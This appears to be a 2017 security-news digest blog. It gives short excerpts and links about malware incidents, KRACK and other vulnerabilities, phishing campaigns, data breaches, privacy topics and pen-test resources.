Eltima Software, confessed today the latest versions of those two apps came with an unwelcome extra – the rather horrid OSX.Proton malware

Proton is a remote-control trojan designed specifically for Mac systems. It opens a backdoor granting root-level command-line access to commandeer the computer, and can steal passwords, encryption and VPN keys, and crypto-currencies from infected systems. Its creator also claims that it'll give full access to iCloud, even if two-factor authentication is used and was put on sale in March for $50,000


For More:
https://www.theregister.co.uk/2017/10/20/a_total_system_os_reinstall_is_the_only_guaranteed_way_to_totally_rid_your_system_of_this_malware_this_is_a_standard_procedure_for_any_system_compromise_with_the_affection_of_administrator_account/

Do you know - Chrome is getting built-in basic antivirus protection for your Windows computer.

ESET scanning engine now built in

"Our engine scans for and cleans potentially harmful applications, specifically the types that negatively impact or target the Chrome browsing experience," said Juraj Malcho, chief technology officer at ESET.

For what it's worth, Chrome, by default, automatically tries to stop software nasties from being accidentally downloaded onto a machine, by checking website URLs against lists of known dangerous and unsafe sites. If you surf to a website known for distributing malware, er, unwanted software, a big red warning will appear in the browser urging you to stop and go back the way you came.

For More Info:
https://www.theregister.co.uk/2017/10/16/chrome_for_windows_malware/

IoT Security - Not many or concerned, For those who are concerned, here a good essay from Mr. Bruce Scheiner

Our biggest IoT security risks will stem not from devices we have a market relationship with, but from everyone else's cars, cameras, routers, drones

Basically, sellers don't compete on safety features because buyers can't efficiently differentiate products based on safety considerations

More here:
https://www.schneier.com/blog/archives/2017/10/iot_cybersecuri.html

BoundHook, GhostHook - These are not fishing terms, these are exploits

BoundHook exploits a feature in all Intel chips  -To  cause an exception in a specific memory location in a user-mode context. Next, it is able to catch the exception and gain control over the thread execution used by a specific application. For example, the technique could allow for the interception of a keyboard event message passed between Windows and a specific service, allowing an attacker to capture or manipulate a victim’s keystrokes

GhostHook - Attack method bypassed Microsoft’s attempts to prevent kernel level attacks (via PatchGuard) and used the hooking approach to take control of a device at the kernel level.

Strange but True:
Microsoft and Intel don’t see either as a vulnerability on their end. Both told CyberArk it will not patch the issue because the attack requires that the adversary already has already fully compromised the targeted system


More Here:
https://threatpost.com/boundhook-attack-exploits-intel-skylake-mpx-feature/128517/

Interested in Penetration Testing (I mean Computer related Pen Test ) - Try this site as your starting point

This site has a bunch of

Cheat Sheets
Walk through
Pen Test tools related info


Excellent for Beginers

https://highon.coffee/

I thought one cannot calculate a private Key from public key. I was wrong

In a nutshell, the bug (in Infineon Technology chipset) makes it possible for an attacker to calculate a private key just by having a target’s public key.


The Infineon flaw is tied to a faulty design of Infineon’s Trusted Platform Module (TPM), a dedicated microcontroller designed to secure hardware by integrating cryptographic keys into devices and used for secured crypto processes.

The currently confirmed number of vulnerable keys found is about 760,000 but possibly up to two to three magnitudes more are vulnerable


For More:
https://threatpost.com/factorization-flaw-in-tpm-chips-makes-attacks-on-rsa-private-keys-feasible/128474/

KRACK ATTACK - Welcome to Monday morning mania

The idea behind a key reinstallation attack can be summarized as follows. When a client joins a network, it executes the 4-way handshake to negotiate a fresh encryption key. It will install this key after receiving message 3 of the 4-way handshake. Once the key is installed, it will be used to encrypt normal data frames using an encryption protocol. However, because messages may be lost or dropped, the Access Point (AP) will retransmit message 3 if it did not receive an appropriate response as acknowledgment. As a result, the client may receive message 3 multiple times. Each time it receives this message, it will reinstall the same encryption key, and thereby reset the incremental transmit packet number (nonce) and receive replay counter used by the encryption protocol.

 We show that an attacker can force these nonce resets by collecting and replaying retransmissions of message 3 of the 4-way handshake. By forcing nonce reuse in this manner, the encryption protocol can be attacked, e.g., packets can be replayed, decrypted, and/or forged. The same technique can also be used to attack the group key, PeerKey, TDLS, and fast BSS transition handshake.

If the victim uses either the WPA-TKIP or GCMP encryption protocol, instead of AES-CCMP, the impact is especially catastrophic. Against these encryption protocols, nonce reuse enables an adversary to not only decrypt, but also to forge and inject packets. Moreover, because GCMP uses the same authentication key in both communication directions, and this key can be recovered if nonces are reused, it is especially affected. Note that support for GCMP is currently being rolled out under the name Wireless Gigabit (WiGig), and is expected to be adopted at a high rate over the next few years

For more info:
https://www.krackattacks.com/

To Trust or NOT to Trust is the dilemma

The Facebook scam abuse “Trusted Contacts, ” a Facebook account recovery feature that sends access codes to a selected list of trusted user’s friends in order to help you regain access to their Facebook account in case you forget your password or lost access to your account.


For More
http://securityaffairs.co/wordpress/64276/cyber-crime/facebook-scam-trusted-contacts.html?

Did you know GDPR Applies to the entire world , not just Europe

GDPR that goes in effect 25 May, 2018, states that any organization that handles the personally identifiable information of any living EU resident must protect that information. If that information is breached, that organization must report the incident and notify those individuals.



Excellent SANS Doc:
https://www.sans.org/reading-room/whitepapers/analyst/preparing-compliance-general-data-protection-regulation-gdpr-technology-guide-security-practitioners-37667#


For More Info:
https://securingthehuman.sans.org/blog/2017/10/10/hey-america-and-world-gdpr-applies-to-you-to

If you are Netflix subscriber , you may want to read this

It begins with a mail purporting to be from the streaming giant, asking for an account update. Once the victim enters their Netflix credentials on a spoofed website, they are redirected to a second screen, which harvests the victim’s credit card credentials. The final step shows a thank-you message, where clicking the “Get Started” button takes visitor to Netflix.com, meaning that they could remain blissfully unaware that they’ve been phished for quite some time.

PhishMe’s analysis found that the email address associated with the campaign has been involved in the use of five different phishing toolkits since June, targeting customers of Chase Bank, Comcast, Netflix, TD Bank and Wells Fargo. But business users can be at risk as well


More Here:
https://www.infosecurity-magazine.com/news/netflix-phish-corporate-dangers?utm_source=twitterfeed&utm_medium=twitter

New Service from Equifax - Free Flash update Offer (Thanks to Hackers)

Equifax website was compromised (again) to deliver Fraudulent Adobe Flash updates.

Data breach not enough, now they have website compromise.



For several hours on Wednesday, and again early Thursday morning, the site was maliciously manipulated again, this time to deliver fraudulent Adobe Flash updates, which when clicked, infected visitors' computers with adware that was detected by only three of 65 antivirus providers

More Here:
https://arstechnica.com/information-technology/2017/10/equifax-website-hacked-again-this-time-to-redirect-to-fake-flash-update/

What could happen when you misconfigure Amazon S3 buckets? - Data Breach - 150K PHI records exposed

New development in "Data Exfiltration" is that there is an increased data staging within cloud infrastructures prior to exfiltration

Imagine a commercial mover putting your furniture into a moving van,” Mayfield explained. “No shock here, that seems like normal asset movement. But then, an accomplice walks up to the fully loaded van, key in the ignition, and drives away. This is not a perfect analogy, but it gets very close to the data staging and exfiltration that happens with cloud infrastructure


For More:
https://www.infosecurity-magazine.com/news/med-records-for-150k-americans

Very Interesting conversation/debate on PASSWORDS - Highly recommended

Check Here:


https://www.schneier.com/blog/archives/2017/10/changes_in_pass.html

Bank Heist - Reminds me of the song Smooth Criminal(s)

Interesting part is  that this Targeted attack includes good coordination at physical and technical levels.

Hussey says his company investigated heists at five different banks in post-Soviet countries. Attackers made off with sums between $3 million and $10 million per bank, for a total of over $40 million



For More:
https://www.bleepingcomputer.com/news/security/bank-cyber-thieves-get-clever-with-new-overdraft-technique/

Microsoft Patch Tuesday - CVE-2017-11826 - patch it ASAP

Microsoft's October Patch Tuesday release covered a wide spectrum of problems with the majority possibly resulting in remote code execution (RCE) and CVE-2017-11826 being publicly disclosed and actively exploited

The early take from cyber industry insiders is CVE-2017-11826, found in Microsoft Office, needs to be immediately addressed

“Top priority for patching should go to a vulnerability in Microsoft Office, CVE-2017-11826, which Microsoft has ranked as “Important” is actively being exploited in the wild,” Jimmy Graham, director of product management at Qualys.


 More Here:
https://www.scmagazine.com/patch-tuesday-microsoft-62-vulnerabilities-28-critical-one-spotted-in-the-wild/article/699296/

Did you know - Browsers are intermediaries in an online transaction

By moving the storage of payment card details in the browser, the responsibility of keeping these details safe is moved to the browser and the user.

The Payment Request API also demands that users take greater responsibility for their data security. 

For More:
https://www.grahamcluley.com/browser-credit-cards/

Beware - New Phishing Attack

 Cybercriminals are using a new phishing campaign that impersonates "secure messages" from private financial institutions such as Bank of America and TD Commercial banking to deliver malware to unsuspecting victims


More Here
http://www.ibtimes.co.uk/new-phishing-emails-claiming-be-secure-message-private-banks-secretly-deliver-malware-1641269?utm_content=61324933&utm_medium=social&utm_source=twitter

What is common between Passwords and Underwear

5 Tenets of Cyber Security

Sweet and Simple (but , rarely followed)

Your organization does not exist to be secure, it exists to get things done.

Amateurs mitigate risk, professionals manage risk. If you are confused by the difference, you need to read some of Bruce Schneier's books. There are three ways to manage risk: you mitigate it, you accept it or you transfer it

Risk is the likelihood of an incident times the harm of that incident. Likelihood is made up of Threats and Vulnerabilities

Our job is to support the organization's mission. That means when dealing with a cyber security challenge, you may not be the one to make a decision


Managing risk is based on three core areas: Technology, Process and People.
We have hit the point of diminishing returns with Technology but continue to fail in the Process and People side.

For More:
https://securingthehuman.sans.org/blog/2017/10/05/the-five-tenets-of-cyber-security/

Nature of Cyberattacks changing in ways that we did not expect

Like

Use of social media to attempt to influence votes or drive division within a nation via Twitter and targeted Facebook advertising campaigns.

Sony hack by North Korea as a pivotal moment when it came to nation states attempting to attack U.S. interests in unconventional ways.

Another social-fueled criminal trend are the rise of "dark markets"
Dark markets that facilitate all matter of crime, from narcotics trafficking, to illegal firearm sales, to identity theft, child exploitation, and computer hacking

More here:
https://threatpost.com/attackers-redefining-objectives-approaches/128276/

October is National Cybersecurity Awareness Month - Need Ideas? - Here is a good resource for Office, Home and even Kids

Get it Here:

https://securingthehuman.sans.org/resources/national-cyber-security-awareness-month?utm_medium=Social&utm_source=Twitter&utm_content=2017+Social+Promoting&utm_campaign=STH+NCSAM

Ever wondered how Email Tracking works?

Here is a nice article:


Almost all web browsers, in the case of webmail, send third-party cookies with these requests. The email address is leaked by being encoded as a parameter into these third-party URLs.

About 29% of emails leak the user’s email address to at least one third party when the email is opened, and about 19% of senders sent at least one email that had such a leak.
The majority of these leaks (62%) are intentional.[4] If the leaked email address is associated with a tracking cookie.

Most of the top leak recipients, including LiveIntent, Acxiom, Conversant Media, and Neustar, are involved in “people-based” marketing

For More Info:
https://freedom-to-tinker.com/2017/09/28/i-never-signed-up-for-this-privacy-implications-of-email-tracking/

Android keyboard app - It it a Keyboard or a Keylogger?

First, it collected a user's Google email account as well as other important device information and uploaded all that data to its servers.

Second, it can download and execute code from a remote server in violation of its policy. Those snippets of code include plugins marked as adware or potentially unwanted programs (PUPs) by multiple anti-virus engines.

For More:
https://www.grahamcluley.com/go-keyboard-app-data-collection/

5 simple ways to improve your online safety in 5 minutes or less

We all know this but, let's be honest , how many of us follow this



1. Use strong, unique passwords for every site requiring login

2. Keep your operating system up-to-date

3. Only connect to Wi-Fi networks you know and trust

4. Turn off Wi-Fi, Bluetooth, camera, and location services

5. Don’t download from questionable sources

For More Info:
\https://www.getcybersafe.gc.ca/cnt/blg/pst-20170929-en.aspx

Free Azure Interactive Posters

http://azureinteractives.azurewebsites.net/

Top 10 phishing email subject lines that launch ransomware (according to KnowB4)

1. Security Alert – 21% 
2. Revised Vacation & Sick Time Policy – 14%
3. UPS Label Delivery 1ZBE312TNY00015011 – 10%
4. BREAKING: United Airlines Passenger Dies from Brain Hemorrhage – VIDEO – 10%
5. A Delivery Attempt was made – 10%
6. All Employees: Update your Healthcare Info – 9%
7. Change of Password Required Immediately – 8%
8. Password Check Required Immediately – 7%
9. Unusual sign-in activity – 6%
10. Urgent Action Required – 6%

For More:
https://www.csoonline.com/article/3209086/hacking/top-10-phishing-email-subject-lines-that-launch-ransomware.html?utm_content=61042854&utm_medium=social&utm_source=twitter

You already know about Deloitte Breach but, did you know this

According to a source close to the investigation, the breach dates back to at least the fall of 2016, and involves the compromise of all administrator accounts at the company as well as Deloitte’s entire internal email system.

Information shared by a person with direct knowledge of the incident said the company in fact does not yet know precisely when the intrusion occurred, or for how long the hackers were inside of its systems.

It appears that Deloitte has known something was not right for some time. According to this source, the company sent out a “mandatory password reset” email on Oct. 13, 2016 to all Deloitte employees in the United States

They (hackers) accessed the entire email database and all admin accounts. But we never notified our advisory clients or our cyber intel clients.”

“Cyber intel” refers to Deloitte’s Cyber Intelligence Centre, which provides 24/7 “business-focused operational security” to a number of big companies, including CSAA Insurance, FedEx, Invesco, and St. Joseph’s Healthcare System, among others.

For more info:
https://krebsonsecurity.com/2017/09/source-deloitte-breach-affected-all-company-email-admin-accounts/

Some things you may not know about the risks associated with SSN

It’s only the last four digits that separate you from other Americans.

Using social media and other data, researchers found they could identify the first five numbers of 44% of deceased people born between 1988 and 2003 in just one attempt


When you carelessly give your Social Security number like you do your telephone number on Match.com, you are putting more than just your tax records in jeopardy. That number is also tied to your medical records, retirement accounts, and credit history

Contrary to popular belief, a new number is not a “get out of jail free” card. For one, it’s not that easy to secure a different number. According to AARP, only 400 new numbers were issued in 2016, despite having over 15 million people victimized by identity theft.


For More Info:
https://www.cheatsheet.com/money-career/worst-mistake-you-can-make-with-your-social-security-number.html/?a=viewall

Security flaw that could allow remote access (iPhone, Android and others). iOS 11 not affected

According to a report from Google Project Zero, a security flaw has been found in iPhones and other devices that use Broadcom Wi-Fi chips. The weakness allows a hacker to remotely take over the device knowing only the MAC address or network-port ID. Since the MAC address of a connected device is easily obtained, it is considered a serious threat

iPhones aren't the only devices at risk. Beniamini has confirmed that Apple TV, Android phones (including the S7 Edge), select routers and smart TVs are also "at risk."


For Mor Info:
https://www.techspot.com/news/71146-security-flaw-found-broadcom-chipset-allows-hackers-hijack.html

Did you know - New Security Measures in iOS 11 - Establishing Trust with a PC Now Requires a Passcode

In previous versions of the system (which includes iOS 8.x through iOS 10.x), establishing trusted relationship only required confirming the “Trust this computer?” prompt on the device screen. Notably, one still had to unlock the device in order to access the prompt; however, fingerprint unlock would work perfectly for this purpose. 

iOS 11 modifies this behaviour by requiring an additional second step after the initial “Trust this computer?” prompt has been confirmed. During the second step, the device will ask to enter the passcode in order to complete pairing.


For More:
https://blog.elcomsoft.com/2017/09/new-security-measures-in-ios-11-and-their-forensic-implications/

Authentication - PIN, Touch ID, Face ID - Pros and Cons.

Here is an excellent article that provides some clarification

https://www.troyhunt.com/face-id-touch-id-pins-no-id-and-pragmatic-security/

Enterprise Security Blind spots

(no surprise here)
61 percent of respondents said that the main security blind spot in the enterprise are unmanaged devices, followed by not up-to-date systems, applications and programs at 55 percent.





More Here:
http://www.zdnet.com/article/hackers-reveal-leading-enterprise-security-blind-spots/

Not a joke - Hacker does NOT want money, demands nude picture

MalwarHunterTeam tweeted out news of a screenlocker posing as ransomware where the bad guys request nude photos of the victim instead of money


More Here:
https://www.scmagazine.com/hacker-asks-for-nude-photos-of-victim-instead-of-money-to-unlock-computer/article/695137/

Updated MetaSploit Cheat Sheet from SANS

Get it here

https://blogs.sans.org/pen-testing/files/2017/02/MetasploitCheatsheet2.0.pdf

iOS Feature (not bug) - Turning Off Wi-Fi and Bluetooth in Control Center Doesn’t Actually Turn Off Wi-Fi or Bluetooth

From the Article:

To be clear, and to be fair, this behavior is exactly what Apple wants. In its own documentation, the company says that "in iOS 11 and later, when you toggle the Wi-Fi or Bluetooth buttons in Control Center, your device will immediately disconnect from Wi-Fi and Bluetooth accessories. Both Wi-Fi and Bluetooth will continue to be available." That is because Apple wants the iPhone to be able to continue using AirDrop, AirPlay, Apple Pencil, Apple Watch, Location Services, and other features, according to the documentation.

For More Info
https://motherboard.vice.com/en_us/article/evpz7a/turn-off-wi-fi-and-bluetooth-apple-ios-11

Interesting (and a bit scary) - Red Alert 2.0 (Trojan) can block incoming calls (from my Bank?)

How come the people who make products can't be this smart



Red Alert 2.0 (Trojan) continues to be updated with functionality recently added to block incoming calls from banks, including those which may be from financial fraud departments investigating potential malicious activity.


More here:
https://www.tripwire.com/state-of-security/featured/red-alert-android-banking-trojan/

Four Cheat Sheets for Malware Analysis from SANS

1. Reverse-Engineering Malicious Code 
2. REMnux Usage Tips for Malware Analysis on Linux 
3. Analyzing Malicious Documents 
4. Malware Analysis and Reverse-Engineering 

Get it here:
https://digital-forensics.sans.org/blog/2017/09/13/malware-analysis-cheat-sheets

Have you heard of Consumer Scores? if the answer is NO then , you have not heard of "Data Brokers" either.

Data brokers are companies which collect personal information on people through both public and private sources—from court records to websites to store sales—and provide it to a wide range of buyers.

It’s unknown exactly how many data brokers operate in the United States, because so many keep a low profile. Credible estimates range from 2,500 to 4,000.

Consumer score is a computer-generated number that attempts to predict your likelihood to get sick, or to pay off a debt. Consumer scores are similar to FICO credit scores, but aren’t regulated as to what factors can be used and how transparent the score and its contributing factors are to the scored individual.


There are three causes for concern. 
First, consumer scores are a secret. If those who sell them are evasive about explaining details, those who use them usually are almost totally unknown.

Second, collected data is often incorrect. “We found a 50 percent accuracy rate in Acxiom data we looked at,” says Dixon, “and they are considered among the best.”

Third, and most disturbing, there’s nothing consumers can do about any of this. They don’t know what data is being collected, or by whom. They don’t know what’s being done with it. They don’t know where it is going.


For More Info:
http://www.newsweek.com/secretive-world-selling-data-about-you-464789

What happens if you don't patch your system - Ask Equifax

Everyone wants to go to heaven but, no one wants to die.
Every company wants to be fully protected but most of them don't want to patch (in time)

Apache Foundation pointed out earlier this week, it reported CVE-2017-5638 in March 2017


BTW.
The company also appears to have suffered another data breach, this time in Argentina where its Bryan Krebs reports “an online portal designed to let Equifax employees in Argentina manage credit report disputes from consumers in that country was wide open, protected by perhaps the most easy-to-guess password combination ever: “admin/admin.”


For More info:
https://www.theregister.co.uk/2017/09/14/missed_patch_caused_equifax_data_breach/

Are You Really Buying Spring Water?

Water sold in a bottle may be labeled distilled, spring, mineral, artesian or sparkling to name a few. More than 17 million barrels of oil are used in the manufacture of bottled water and 50 billion water bottles are used and discarded every year.² The cost of bottled water may be as much as 2,000 times more than tap water;³ 8 glasses of water each day from your tap costs approximately 49 cents per year while the same amount in bottled water costs $1,400.⁴

For More details:
http://articles.mercola.com/sites/articles/archive/2017/09/06/are-you-really-buying-spring-water.aspx

Free - Pen Test Cheat Sheet for Power Shell from SANS

Nothing great, just a few important commands in 2 pages

Get it here:
https://pen-testing.sans.org/blog/2016/05/25/sans-powershell-cheat-sheet?utm_medium=Social&utm_source=Twitter&utm_content=SANSPenTest+BLOG+PowerShell+Cheat+Sheet&utm_campaign=SANS+Pen+Test

Single SpamBot had 711 million records of which 80 million are credentials

“Just for a sense of scale, that’s almost one address for every single man, woman and child in all of Europe,” Hunt wrote

The spambot is called Onliner and it’s been around since 2016 and is best known for spreading the Ursnif banking Trojan.


For more info:
https://threatpost.com/spambot-contains-mind-boggling-amount-of-email-smtp-credentials/127722/

Can you change a benign email to a malicious one after it has been sent? - YES , we have ROPEMAKER

Ropemaker - stands for Remotely Originated Post-delivery Email Manipulation Attacks Keeping Email Risky

A successful exploitation of the Ropemaker attack could allow an attacker to remotely modify the content of an email sent by the attacker itself, for example swapping a URL with the malicious one.

This can be done even after the email has already been delivered to the recipient and made it through all the necessary spam and security filters, without requiring direct access to the recipient’s computer or email application, exposing hundreds of millions of desktop email client users to malicious attacks.


More Details Here:
https://thehackernews.com/2017/08/change-email-content.html

Dark Side of Technology - Sound based hacks (CovertBand)

• Detect people’s activities
• Induce false readings in a phone’s accelerometer
• balancing gyroscopes like drones and hoverboards could be similarly disrupted
• remotely hacking into air-gapped computers
• Covert Sonic Weapon

More details here:
https://www.fastcompany.com/40455626/hack-music-can-watch-you-through-your-devices

check your password if it is already in the compromised list

You think you have a strong password
Or
You create a new password and you believe it is good enough

Are you sure it is not part of the  compromised password list?


Go the the site below and test your password.

https://haveibeenpwned.com/Passwords

Wannacry and NotPetya are just the beginning - Can you detect lateral movement from Event Logs - Yes but how?

Japan Computer Emergency Response Team Coordination Center (JPCERT/CC) has a excellent document 


Japan Computer Emergency Response Team Coordination Center (JPCERT/CC) extracted tools used by many attackers by investigating recently confirmed cases of targeted attacks. Then, a research was conducted to investigate what kind of logs were left on the server and clients by using such tools, and what settings need to be configured to obtain logs that contain sufficient evidential information. This report is a summary of the results of this research

The following Page has a PDF link 

https://www.jpcert.or.jp/english/pub/sr/ir_research.html